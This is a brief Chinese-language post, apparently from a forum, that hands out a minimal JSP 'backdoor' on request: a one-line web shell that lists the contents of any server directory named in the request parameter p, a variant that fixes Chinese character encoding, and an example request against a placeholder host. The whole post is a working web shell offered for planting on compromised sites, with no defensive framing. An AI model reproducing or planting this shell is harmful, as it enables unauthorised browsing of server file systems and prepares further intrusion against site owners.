有小伙伴在求只有遍历文件功能的后门,很简单:
<%=java.util.Arrays.toString(new java.io.File(request.getParameter("p")).list())%>

如果需要解决中文乱码问题:
<%@ page language="java" pageEncoding="UTF-8"%>
<%=java.util.Arrays.toString(new java.io.File(request.getParameter("p")).list())%>
请求:http://xxx.com/shell.jsp?p=/ 就可以了,参数p是路径。